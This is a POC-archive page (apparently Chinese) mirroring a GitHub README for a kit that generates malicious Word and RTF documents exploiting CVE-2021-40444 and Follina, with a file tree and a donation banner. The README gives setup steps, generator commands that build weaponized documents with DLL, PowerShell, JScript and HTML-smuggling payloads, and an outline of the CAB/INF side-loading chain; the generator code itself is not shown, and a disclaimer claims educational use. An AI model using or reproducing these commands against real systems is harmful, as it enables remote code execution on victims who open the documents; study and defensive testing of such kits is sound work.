支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 84bef9e0bab6fc2334fd0fd75f713a8c8ba24580

来源
https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444
关联漏洞
标题:Microsoft MSHTML.DLL 路径遍历漏洞 (CVE-2021-40444)
Description:Microsoft MSHTML.DLL是美国微软(Microsoft)公司的一个用于解析HTML语言的动态链接库,IE、Outlook、Outlook Express等应用程序都使用了该动态链接库。 Microsoft MSHTML.DLL 存在路径遍历漏洞,远程攻击者可以创建带有恶意ActiveX控件的特制Office文档,诱使受害者打开文档并在系统上执行任意代码。
Description
This repository contains scripts and resources for exploiting the Follina CVE and CVE-2021-40444 vulnerabilities in Microsoft Office. The scripts generate malicious document files that can execute arbitrary code on the target system.
介绍
# Exploiting Follina CVE and CVE-2021-40444 Vulnerabilities

## Table of Contents
1. [Introduction](#introduction)
2. [Prerequisites](#prerequisites)
3. [Setup and Installation](#setup-and-installation)
4. [Usage](#usage)
5. [Detailed Explanation](#detailed-explanation)
6. [Commands](#commands)
7. [Disclaimer](#disclaimer)

## Introduction
This repository contains scripts and resources for exploiting the Follina CVE and CVE-2021-40444 vulnerabilities in Microsoft Office. The scripts generate malicious document files that can execute arbitrary code on the target system.

## Prerequisites
- Flare VM
- Python 3.x
- Microsoft Word
- Required Python packages (listed in `requirements.txt`)

## Setup and Installation
1. **Flare VM Setup:**
   - Ensure you have Flare VM installed. The credentials for the VM are:
     - Username: `lab`
     - Password: `password`
   
2. **Python and Virtual Environment:**
   ```bash
   git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444
   cd CVE-2021-40444
   ```
   - Make sure Python and pip are installed in the virtual machine.
   - Install the `virtualenv` package using the following command:
     ```bash
     pip install virtualenv
     ```
   - Create a virtual environment named `venv`:
     ```bash
     python -m virtualenv venv
     ```
   - Activate the virtual environment:
     ```bash
     venv\Scripts\activate.bat
     ```
   - Install the required packages:
     ```bash
     pip install -r requirements.txt
     ```

## Usage
1. **Generating the Exploit:**
   - Navigate to the project directory and run the following command to generate the exploit:
     ```bash
     python generator.py -u http://192.168.197.132 -P test\calc.dll --host
     ```
     Replace `192.168.197.132` with your IP address.

2. **Accessing the Generated Document:**
   - The generated `.docx` file will be located in the directory:
     ```
     C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
     ```

## Detailed Explanation
### Chain Exploitation
- The document (`.docx`) is opened.
- The document contains a relationship pointing to malicious HTML stored in `document.xml.rels`.
- The HTML link opens in IE preview.
- An object points to a CAB file and an iframe pointing to an INF file, both embedded in JScript and prefixed with the ".cpl:" directive.
- The CAB file opens, saving the INF file in the `%TEMP%Low` directory.
- The INF file is opened using the ".cpl:" directive, causing `rundll32` to side-load the INF file.

### Scripts Overview
#### `generator.py`
- Implements an exploit for CVE-2021-40444, allowing remote code execution via Microsoft Office.
- Contains various helper functions for patching CAB files, creating RAR files, generating payloads, and more.

#### `cab_parser.py`
- A tool for viewing CAB file headers.
- Defines classes and methods for handling and parsing CAB files.

### Section 2.0: Setup in Flare VM
- Install necessary tools and packages.
- Create and activate a virtual environment.
- Install Python packages from `requirements.txt`.

## Commands
- Generate the original exploit and test locally:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.dll --host
- Generate CABless exploit leveraging MS-MSDT (Follina attack), in both DOCX and RTF docs:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
- Generate CABless exploit (IE-only) with HTML smuggling and test locally via IE:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
- Generate CABless exploit with RAR and test locally via IE:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t

## Disclaimer
This project is for educational purposes only. Use it responsibly and do not exploit vulnerabilities on systems you do not have permission to test. Misuse of this information can lead to criminal charges.
文件快照

 [4.0K]  /data/pocs/84bef9e0bab6fc2334fd0fd75f713a8c8ba24580
├── [4.0K]  CVE-2021-40444
│   ├── [4.0K]  bin
│   │   ├── [619K]  Rar.exe
│   │   ├── [485K]  RarExt32.dll
│   │   └── [558K]  RarExt.dll
│   ├── [6.8K]  cab_parser.py
│   ├── [ 155]  clean.bat
│   ├── [4.0K]  data
│   │   └── [4.0K]  word_dat
│   │       ├── [1.4K]  [Content_Types].xml
│   │       ├── [4.0K]  docProps
│   │       │   ├── [ 733]  app.xml
│   │       │   └── [ 745]  core.xml
│   │       ├── [4.0K]  _rels
│   │       └── [4.0K]  word
│   │           ├── [ 14K]  document.xml
│   │           ├── [2.3K]  fontTable.xml
│   │           ├── [4.0K]  _rels
│   │           │   └── [1.2K]  document.xml.rels
│   │           ├── [2.6K]  settings.xml
│   │           ├── [ 32K]  styles.xml
│   │           ├── [4.0K]  theme
│   │           │   └── [6.9K]  theme1.xml
│   │           └── [ 603]  webSettings.xml
│   ├── [ 17K]  generator.py
│   ├── [4.0K]  out
│   │   ├── [ 12K]  document.docx
│   │   └── [   0]  hello.docx
│   ├── [4.0K]  __pycache__
│   │   └── [ 16K]  cab_parser.cpython-311.pyc
│   ├── [  25]  requirements.txt
│   ├── [ 927]  setup.inf
│   ├── [ 275]  setup.rpt
│   ├── [4.0K]  srv
│   │   ├── [   0]  21WBQ6UPOZT9.html
│   │   ├── [   0]  DU92IN37GTLF.html
│   │   ├── [   0]  DV0WJATZJEN0.html
│   │   ├── [ 11K]  index.html
│   │   ├── [5.1K]  J0803VTK5W9N.html
│   │   ├── [ 403]  mswordcab.ddf
│   │   ├── [   0]  QRN6Q3438F8Q.html
│   │   ├── [5.1K]  R7GGVKCTDG7X.html
│   │   └── [   0]  WR0KINF7X8YR.html
│   ├── [4.0K]  template
│   │   ├── [5.1K]  cabless-msdt-sample2.html
│   │   ├── [5.1K]  cabless-rar-sample1.html
│   │   ├── [6.2K]  cabless-smuggling-sample1.html
│   │   ├── [4.5K]  cab-orig-debobfuscated1.html
│   │   ├── [5.9K]  cab-orig-debobfuscated2.html
│   │   ├── [5.3K]  cab-orig-j00sean.html
│   │   ├── [6.2K]  cab-orig-obfuscated.html
│   │   ├── [4.9K]  cab-uri-debobfuscated1.html
│   │   ├── [6.5K]  cab-uri-debobfuscated2.html
│   │   ├── [6.3K]  cab-uri-obfuscated.html
│   │   ├── [5.4K]  cab-uri-sample1.html
│   │   ├── [6.2K]  cab-uri-test-obfuscated.html
│   │   └── [ 11K]  index.html
│   ├── [4.0K]  test
│   │   ├── [ 81K]  calc.dll
│   │   ├── [ 200]  calc.hta
│   │   ├── [ 101]  calc.js
│   │   ├── [  24]  calc.ps1
│   │   ├── [ 143]  calc.vbs
│   │   ├── [ 112]  job-jscript.wsf
│   │   └── [ 112]  job-vbs.wsf
│   └── [4.0K]  util
│       └── [1.6K]  server.py
├── [1.0K]  LICENSE
└── [3.8K]  README.md

15 directories, 54 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。